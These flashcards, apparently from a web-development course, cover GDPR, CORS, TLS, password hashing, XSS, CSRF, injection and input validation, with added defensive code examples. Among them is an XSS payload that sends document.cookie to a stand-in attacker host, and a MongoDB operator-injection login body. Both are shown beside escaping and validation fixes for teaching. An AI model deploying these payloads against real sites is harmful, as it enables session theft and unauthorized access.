2.10 Data Security, Validation & Ethics Flashcards

1
Q

What’s the duty of a web developer?

A

To design and build applications that are not only secure but ethically responsible.

2
Q

Is there ever foolproof security?

A

No. Multiple layers of security (defence in depth) are a necessity, so that even if one control is bypassed or breached, another still stands between the attacker and the data.

3
Q

In April 2016, the European Union adopted the General Data Protection Regulation (GDPR), which has applied since 25 May 2018. What does it pertain to?

A

It governs the processing of personal data of people in the EU. It applies to organizations established in an EU country regardless of where their users are, and to organizations outside the EU that offer goods or services to, or monitor the behaviour of, people in the EU. Although it is EU law, the GDPR has become something of an international baseline for application developers. Since the protection attaches to the EU user rather than to the company's location, a company beyond the EU may still fall within the regulation's scope.

4
Q
General principle outlined in the GDPR: Lawfulness, Fairness, Transparency
A

“Lawfulness,” here, means that every processing activity needs a legal basis recognised by the GDPR (for example the user’s consent, the performance of a contract, or a legal obligation). “Fairness” means that data must be collected truthfully and in good faith, not in ways the user would find deceptive. “Transparency” means keeping users informed, in plain language, about when and for what purposes their data is being collected.

5
Q
General principle outlined in the GDPR: Purpose Limitation
A

Organizations should only collect data for a specified, limited, and legitimate purpose. In other words, a company can’t say it’s collecting data for one thing (e.g., to populate a social network profile) but actually be collecting it for another purpose (e.g., to sell to consulting firms) without explicitly informing its users.

6
Q
General principle outlined in the GDPR: Data Minimization
A

Organizations shouldn’t collect more data than they need for their stated purposes. Data you never collected cannot be stolen, so minimization limits what an attacker can obtain if your application’s security is breached. It also makes it easier to keep the data you do hold accurate.

7
Q
General principle outlined in the GDPR: Accuracy
A

All data should be up-to-date and accurate, and organizations should take reasonable steps to erase or rectify inaccurate data (e.g., by prompting users to update their data).

8
Q
General principle outlined in the GDPR: Storage Limitation
A

Similarly, organizations shouldn’t retain personal user data any longer than is absolutely required. Data should be consistently reviewed to ensure its necessity. This also helps to keep data accurate.

9
Q
General principle outlined in the GDPR: Integrity & Confidentiality
A

This guideline revolves around keeping data accurate, secure and confidential (i.e., not accessible to or modifiable by unauthorized parties). This is also what the rest of this Exercise will concern itself with. Keeping data secure usually involves encryption, which protects data in transit and at rest even if it is intercepted or stolen, together with access controls that keep it out of the wrong hands in the first place.

10
Q

What is the “same-origin policy”?

A

The same-origin policy is a browser security mechanism that prevents a script running on one origin (scheme + host + port) from reading responses to requests it makes to a different origin. It is not limited to GET: the browser may still send a simple cross-origin request (such as a plain GET or a form-style POST), but it withholds the response from the script, and it refuses to send non-simple requests (e.g., JSON bodies or custom headers) at all until a preflight OPTIONS request has been approved by the target server.

11
Q

Unless the server opts in, if your frontend JavaScript makes a GET request from one domain to another domain, what error will you see in the browser console?

A

No ‘Access-Control-Allow-Origin’ header is present on the requested resource. Origin ‘…’ is therefore not allowed access.

Note that the request may well have reached the server: this error means the browser received the response but refused to expose it to your script, because the server did not send the CORS header that permits your origin.

12
Q

Disadvantages of the “same-origin policy”

A

While the same-origin policy is essential for protecting users on the web, it does create a few unwanted problems when it comes to working with APIs. By stopping a page’s scripts from reading responses from another origin, it also stops a frontend from calling an API hosted on a different server (i.e., a different origin/domain) via fetch or XMLHttpRequest. For instance, think of a real-estate website. Oftentimes, these types of websites will load maps of houses by making requests to the Google Maps API; under the same-origin policy alone, those requests would be blocked, as the Google Maps API is located on a different origin (“maps.google.com”) than the real-estate website. The same problem hits your own app the moment its frontend and its API are served from different hosts.

13
Q

Cross-Origin Resource Sharing (CORS)

A

CORS extends HTTP: the browser adds an Origin header carrying the requesting page’s scheme, host and port, and the receiving server can then answer with Access-Control-* response headers saying whether that origin is allowed. The browser enforces the decision and either hands the response to the script or blocks it. Keep in mind that CORS protects users of browsers; it is not authentication. A non-browser client (curl, a script) can send any Origin header it likes, so CORS must never be the only thing standing between an attacker and your data.

14
Q

When the server receives this request, it checks whether the included domain is allowed, then sends back an HTTP response with a new header of its own, indicating that the requesting domain was permitted:

A

“Access-Control-Allow-Origin: [the one permitted origin that matched, or a wildcard * for all origins]”

15
Q

For example, if an HTTP request were sent to a server from “test.com,” the server’s response could include either an asterisk, which allows access from all origins:

A

Access-Control-Allow-Origin: *

Or a single, specific origin, for instance:

Access-Control-Allow-Origin: https://www.test.com

The header accepts exactly one origin value, not a list. To permit several origins (say https://www.test.com and https://static.sitename.net), the server compares the request’s Origin header against its allowlist and echoes back the one that matched, adding Vary: Origin so that caches do not serve one origin’s response to another. Note also that http:// and https:// versions of the same host are different origins; only allow the https one unless you really do serve the site over plain HTTP.

16
Q

what’s the command to install cors?

A

npm install cors

17
Q

Once you have installed cors, what do you have to do afterwards in your code?

A
const cors = require('cors');
app.use(cors()); // with no options this sends Access-Control-Allow-Origin: * (every origin allowed)
18
Q

What’s a general rule for allowing requests?

A

You should only allow requests from the origins that actually need your API.

For instance, if your application’s frontend were hosted separately from the API, you’d want to ensure the domain hosting your frontend was granted access.

The fewer domains that have access to your API, the more secure it (and the data it provides access to) will be.

19
Q

Why is it considered bad practice to use an asterisk * ?

A

Because that would grant every website on the internet the right to read your API’s responses from its users’ browsers. A malicious page could then call your API on behalf of anyone who visits it. Browsers also refuse to combine * with credentials (cookies, Authorization headers), so an API that needs a logged-in user has to name an explicit origin anyway.

20
Q

Why are HTTP requests insecure?

A

Normal “http” requests are sent in plain text format, in other words unencrypted. Anyone positioned on the path (the operator of a public WiFi hotspot, someone else on the same coffee-shop or airport network, a compromised router) can read everything in them and can also modify them in transit. That puts any data you fill in on websites (credit card information, your name and address, session cookies) at risk.

21
Q

Why are HTTPS requests more secure than HTTP?

A

With the “https” prefix, messages sent between the browser and the server are encrypted using the security protocol TLS (Transport Layer Security, the successor of Secure Sockets Layer; the older name “SSL” is still widely used for it). Traffic encrypted this way can’t be read or silently modified without the session keys that the two ends negotiate using the server’s certificate, so the data stays safe from prying eyes even if the packets themselves are intercepted. An SSL/TLS certificate is required to set up such a connection: it binds the server’s public key to its domain name and is signed by a certificate authority the browser trusts. Oftentimes, if you host your website or web application with a hosting provider, the provider will include a certificate (sometimes for a price) as part of its hosting package; free certificates are also available from Let’s Encrypt. Obtaining one requires, at minimum, proof that you control the domain; higher-assurance certificates also verify your company’s identity.

22
Q

Which two cryptographic keys belong to an SSL/TLS certificate?

A

A private key and a public key. The key pair is generated first, on the server; the public key is placed in the certificate that the certificate authority signs and that is sent to every client, while the private key never leaves the server. Anything encrypted to the public key can only be decrypted with the private key, and only the private key can produce signatures that the public key verifies, so a leaked private key lets an attacker impersonate the site.

23
Q

What is encryption?

A

Encryption is the process of turning readable data (plaintext) into ciphertext, a series of characters that is unreadable without the key; decryption with the key reverses it back to the original form. This ensures data can only be read by those with the proper permission (i.e., those holding the key), even if the ciphertext itself is stolen.

24
Q

What is hashing?

A

Hashing is the process of turning data of any size into a fixed-length string of characters that (with a good hashing algorithm) can’t be turned back into the original. Unlike encryption there is no key and no reversal. Note that the same input always produces the same hash, so a hash does not hide a guessable input: an attacker who steals a database of unsalted, fast hashes can simply try common passwords and compare. That is why password hashing uses a per-user random salt and a deliberately slow algorithm.

25
Q

When is hashing useful?

A

Whenever you log in to a website or app, you input your password. This password is usually hashed. When you first register, the password you provide is hashed, then placed into the database on the server. Then, every time you log in, the password you provide is hashed again with the same salt. This hash is compared to the hash in the database, and if they match, you’re allowed to log in. This keeps your plaintext password from ever being stored or seen by anyone, including the creators of the app or website. It does not make a weak password safe: if the database leaks, attackers try candidate passwords against the hashes offline, which is why a slow, salted hash and a strong password both matter. (This is also why you’ll sometimes get warning emails from companies, reminding you that they’ll never ask you for your password, and that any correspondence that does is likely a scam.)

26
Q

In Node.js, you can use a module called bcrypt to hash users’ passwords and compare hashed passwords every time users log in, for a more secure login authentication process. bcrypt generates a random salt for each password and is deliberately slow, which is what makes offline guessing expensive. To install bcrypt, run this command in your terminal:

A

npm install bcrypt

27
Q

What are Cross-Site Scripting Attacks (XSS)?

A

A type of attack that plays out on the frontend of your app. It involves injecting malicious JavaScript into a website or web application (for instance through a comment, profile field or URL parameter that the site later renders without escaping). The injected code runs on the client side, in the browsers of other users who view that page, with their session and their privileges, and can lead to all sorts of serious problems if allowed to occur.

28
Q

Cross-Site Scripting (XSS) attacks could include:

A

Making HTTP requests to another site using your identity (e.g., with your session cookies or tokens, as mentioned earlier). For example, they could transfer money from your bank account or send spam to your contacts.

Injecting links into a page that direct you to a similar-looking site. This new site could ask you to submit personal and/or financial information, which would then be submitted not to the legitimate site, but straight to the attacker’s database.

Infecting your computer with malware.

29
Q

How can you protect yourself and your users from Cross-Site Scripting (XSS) attacks?

A

Validating user input: This involves checking that all input from users contains only the characters expected for that field. Strictly formatted input fields minimize the possibility of malicious code being accepted, as a code snippet is unlikely to pass a rigid formatting check. You’ll be exploring a few of these techniques later on in this Exercise. Validation is a first line of defence, not the last: many fields (comments, names, addresses) legitimately need characters such as < or “.

Escaping data: This is the primary defence. It involves encoding data at the point where your app renders it, so that characters with meaning in HTML (such as < and >, which can open a script tag, or quotes that can close an attribute) are shown as text rather than interpreted as markup. Template engines and frameworks usually escape by default; the risk is in code that builds HTML by hand or writes to innerHTML.
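The escaping step from the card above, as an added example that is not part of the original page: a vulnerable rendering function beside its escaped version, run over a constructed attacker input of the kind the XSS card describes. The payload, the comment-rendering functions and the check helper are assumptions for the demonstration.

```javascript
// Added example: output escaping for user-supplied text rendered into HTML,
// beside the unescaped rendering that is vulnerable.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Replace every character that has meaning in HTML with its entity, so the
// browser displays it as text instead of interpreting it as markup.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: interpolates the comment straight into markup. Kept only to show
// the difference; never ship this.
function renderCommentUnsafe(author, text) {
  return `<li><b>${author}</b>: ${text}</li>`;
}

// Hardened: every dynamic value is escaped at the point it enters the HTML.
function renderComment(author, text) {
  return `<li><b>${escapeHtml(author)}</b>: ${escapeHtml(text)}</li>`;
}

// Does the rendered HTML still contain a script tag or an inline event
// handler? A crude check used only for the demonstration below.
function containsActiveMarkup(html) {
  return /<script|<img[^>]*onerror=/i.test(html);
}

// Constructed attacker input: an image that fails to load and ships the
// viewer's cookie to an assumed attacker host.
const XSS_PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Side by side: the unsafe version carries the payload through, the safe one
// turns it into harmless text.
function compare() {
  return {
    unsafe: renderCommentUnsafe('mallory', XSS_PAYLOAD),
    safe: renderComment('mallory', XSS_PAYLOAD),
  };
}
```

escapeHtml is correct for text nodes and quoted attribute values; a value placed inside a script block, a URL or a CSS rule needs the encoding for that context instead, which is one more reason to let a template engine do the escaping.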

30
Q

What is a Cross-Site Request Forgery, or “CSRF,” attack?

A

It’s when an attacker makes a victim’s browser send a request to a website the victim is logged into, without the victim’s consent, for instance via a hidden form or image on a page the attacker controls. Because the browser automatically attaches the victim’s session cookie, the web app believes the request comes from the trusted, logged-in user and does whatever the attacker’s request asks, which could be anything from posting on their social network feed to transferring funds illicitly. The attack targets state-changing requests (POST, PUT or DELETE, or a GET that changes state, which is one reason GET handlers should never change state).

31
Q

What is one way of protecting against CSRF attack?

A

Via a special type of web token called a CSRF token: an unpredictable random value that the server ties to the user’s session and embeds in every form (or exposes to the page’s own JavaScript) that triggers a state-changing request. The server rejects any such request that does not carry the token matching the session. An attacker’s site cannot read the token because of the same-origin policy, so it cannot assemble a complete request. Marking the session cookie SameSite=Lax or Strict is a complementary defence: the browser then withholds the cookie from most cross-site requests.

32
Q

What is an SQL injection attack?

A

In this type of attack, nefarious SQL statements are provided to an application (e.g., submitted through a form) and end up spliced into a query, which can then be used to expose or alter data in the web application. SQL injection occurs when an application builds queries by concatenating untrusted input into SQL text instead of passing it as a value. A hacker could, for example, enter SQL code into a form that would instruct the site’s database to return all of its stored usernames and password hashes. Validating input (rejecting anything that is not the expected shape) reduces the exposure, but the reliable fix is to never mix data into query text at all: use parameterized queries (prepared statements), so the database receives the input strictly as data.

33
Q

What is the best way to address an SQL injection attack?

A

Validate user input on the server side, this time checking for input of the kind your database would interpret, and keep data out of the query structure entirely (parameterized queries for SQL). For your myFlix app, you used MongoDB, whose queries are JSON objects, so the equivalent attack is operator injection: a login body such as {"Username": {"$ne": null}} arrives from the JSON body parser as an object instead of a string and turns a username lookup into “any user”. Ensure each field really is a string of the expected shape before it reaches a query. You’ll be setting up server-side validation for your myFlix app in just a minute.
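The MongoDB-style operator injection described above and the check that stops it, as an added example that is not part of the original page. The Username and Password field names follow the myFlix login body the page refers to; the filter builder, the in-memory stand-in for the users collection and its tiny matcher are assumptions for the demonstration, written so the attack and the fix can be run offline.

```javascript
// Added example: rejecting query-operator injection against a MongoDB-style
// login lookup, with a stand-in collection to show what the raw attack does.

// True when the value contains no object key starting with '$' at any depth.
// Such keys are MongoDB operators ($ne, $gt, $regex, ...) and must never come
// from a client.
function isOperatorFree(value) {
  if (Array.isArray(value)) return value.every(isOperatorFree);
  if (value !== null && typeof value === 'object') {
    return Object.entries(value).every(([k, v]) => !k.startsWith('$') && isOperatorFree(v));
  }
  return true;
}

// Build the database filter for a login attempt. Express's JSON body parser
// turns {"Username": {"$ne": null}} into a real object, so the string type
// check is what actually stops the attack; the operator scan is a second net.
function buildLoginFilter(body) {
  if (!body || typeof body !== 'object') throw new TypeError('body must be an object');
  const { Username, Password } = body;
  if (typeof Username !== 'string' || typeof Password !== 'string') {
    throw new TypeError('Username and Password must be strings');
  }
  const filter = { Username };
  if (!isOperatorFree(filter)) throw new TypeError('operator in filter');
  return filter; // Password is checked against the stored hash, never queried by value
}

// Constructed stand-in for a users collection plus a matcher that mimics how
// an unsanitized {$ne: null} condition matches every document.
const USERS = [{ Username: 'alice' }, { Username: 'bob' }];

function matches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    if (cond !== null && typeof cond === 'object' && '$ne' in cond) return doc[field] !== cond.$ne;
    return doc[field] === cond;
  });
}

function findUsers(filter) {
  return USERS.filter((doc) => matches(doc, filter));
}

// The attack the page's "JSON attacks" sentence refers to: operators in place
// of strings. Passed straight through, this filter matches every user.
const INJECTED_BODY = { Username: { $ne: null }, Password: { $ne: null } };
```

The same idea applies to SQL: the fix is not to strip suspicious characters out of the string but to make sure user input can only ever be data, never structure.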

34
Q

Why is it important to add input validation to the server side?

A

Imagine if a malicious entity made a request to your application’s registration or login endpoint directly (with curl or a script, bypassing whatever checks your frontend does), passing a username of david123[Do something bad]. With no server-side input validation, this username would be accepted and stored in your database, from where it could later be rendered into pages or used in queries and harm your application. You can prevent this by implementing server-side logic that accepts only the characters each field is supposed to contain and rejects everything else; client-side validation alone is a convenience for honest users, not a security control.

35
Q

What are the recommended guidelines for input validation?

A

For usernames, only alphanumeric characters (letters and digits) should be allowed. This rejects inputs like the one above (with the brackets). Ideally, though, you should still allow non-English letters, such as ë, to accommodate international users of your application.

For integers, only inputs of the numbers 0 through 9 should be allowed.

For passwords, all characters should be allowed, but a minimum length is usually required, often together with a mix of digits, lowercase and uppercase letters.

For email addresses, there are more complicated rules you can implement, for instance, requiring an @ character and ensuring each part of a normal email address is present (you’ll remember first learning about this back in Exercise 1.7: Complex UI Elements in JS).

For a date, such as a birthday, you can require it be written in an exact date format, for instance, DD.MM.YYYY, and check that it is a real calendar date.

36
Q

What is the express validator?

A

The express-validator library offers a variety of validation methods for different types of submitted data, which you attach to a route as middleware and then check with validationResult(req) before touching the database.

The first thing you’ll need to do, as always, is install the library (it is a package, after all!), so go ahead and type the following into your terminal:

npm install express-validator
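The validation rules from the guidelines card (usernames, integers, passwords, emails, DD.MM.YYYY dates) as plain server-side validators, added here as an example that is not part of the original page. It runs without express-validator so it can be executed offline; the registration schema, the validate() helper and its field names are assumptions for the demonstration, and it goes one step beyond the card by also rejecting fields the endpoint never expected.

```javascript
// Added example: server-side field validators for the rules on this page,
// plus a validate() helper that returns the list of failures.
const rules = {
  // Letters and digits only, from any alphabet (so 'Zoë42' passes, '<b>' does not).
  username: (v) => typeof v === 'string' && /^[\p{L}\p{N}]{3,30}$/u.test(v),

  // Digits 0 through 9 only.
  integer: (v) => typeof v === 'string' && /^[0-9]+$/.test(v),

  // Any characters allowed, but a minimum length and a mix of cases and digits.
  password: (v) => typeof v === 'string' && v.length >= 8 &&
    /[a-z]/.test(v) && /[A-Z]/.test(v) && /[0-9]/.test(v),

  // One '@', something on both sides, and a dot in the domain part.
  email: (v) => typeof v === 'string' && v.length <= 254 &&
    /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(v),

  // Exact DD.MM.YYYY format and a real calendar date (rejects 31.02.2000).
  date: (v) => {
    const m = typeof v === 'string' && /^(\d{2})\.(\d{2})\.(\d{4})$/.exec(v);
    if (!m) return false;
    const [day, month, year] = [m[1], m[2], m[3]].map(Number);
    const d = new Date(Date.UTC(year, month - 1, day));
    return d.getUTCFullYear() === year && d.getUTCMonth() === month - 1 && d.getUTCDate() === day;
  },
};

// Which rule applies to which field of the (assumed) registration body.
const REGISTRATION_SCHEMA = {
  Username: 'username',
  Password: 'password',
  Email: 'email',
  Birthday: 'date',
};

// Run every rule; return [] when the body is acceptable, otherwise one entry
// per failing field. Unknown extra fields are rejected too, so a client cannot
// smuggle in attributes the endpoint never meant to accept.
function validate(body, schema) {
  const errors = [];
  for (const [field, ruleName] of Object.entries(schema)) {
    if (!rules[ruleName](body[field])) errors.push({ field, rule: ruleName });
  }
  for (const field of Object.keys(body)) {
    if (!(field in schema)) errors.push({ field, rule: 'unexpected field' });
  }
  return errors;
}
```

With express-validator the same checks are written as middleware, for example check('Username').isAlphanumeric(), check('Password').isLength({ min: 8 }) and check('Email').isEmail(), followed by validationResult(req) in the handler; note that isAlphanumeric() is ASCII-only unless you pass it a locale, so the ë case above needs that argument.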

37
Q

What is shared & dedicated hosting?

A

Shared hosting: Your website shares a server with other customers’ websites

Dedicated hosting: Your website is hosted on its own server.

38
Q

What are the disadvantages of shared hosting?

A

Performance may suffer as the server is shared by multiple clients, and you (as a customer) don’t have full control over the server.

39
Q

What are the advantages of dedicated hosting?

A

Better performance and full control over the server, at a generally higher price.

Even with dedicated servers, however, large businesses oftentimes need to purchase multiple servers as their web traffic grows. This can lead to wasted costs, especially if their traffic were to ever slow down again in the future.

40
Q

How do you push to Heroku using the command line?

A

git add .

git commit -m "insert your message here"

git push heroku master

(If your local branch is called main rather than master, push that instead: git push heroku main.)

41
Q

What are Environment Variables?

A

Environment variables are similar to those you define in any programming language, except that they’re not limited to the context of your Node.js server application (in this case, your myFlix API). Instead, they reside in the context of the operating system that’s hosting the server application, and your code reads them at startup (process.env in Node.js). This is where secrets such as database connection strings and API keys belong, so that they are never hard-coded in source files or committed to the repository.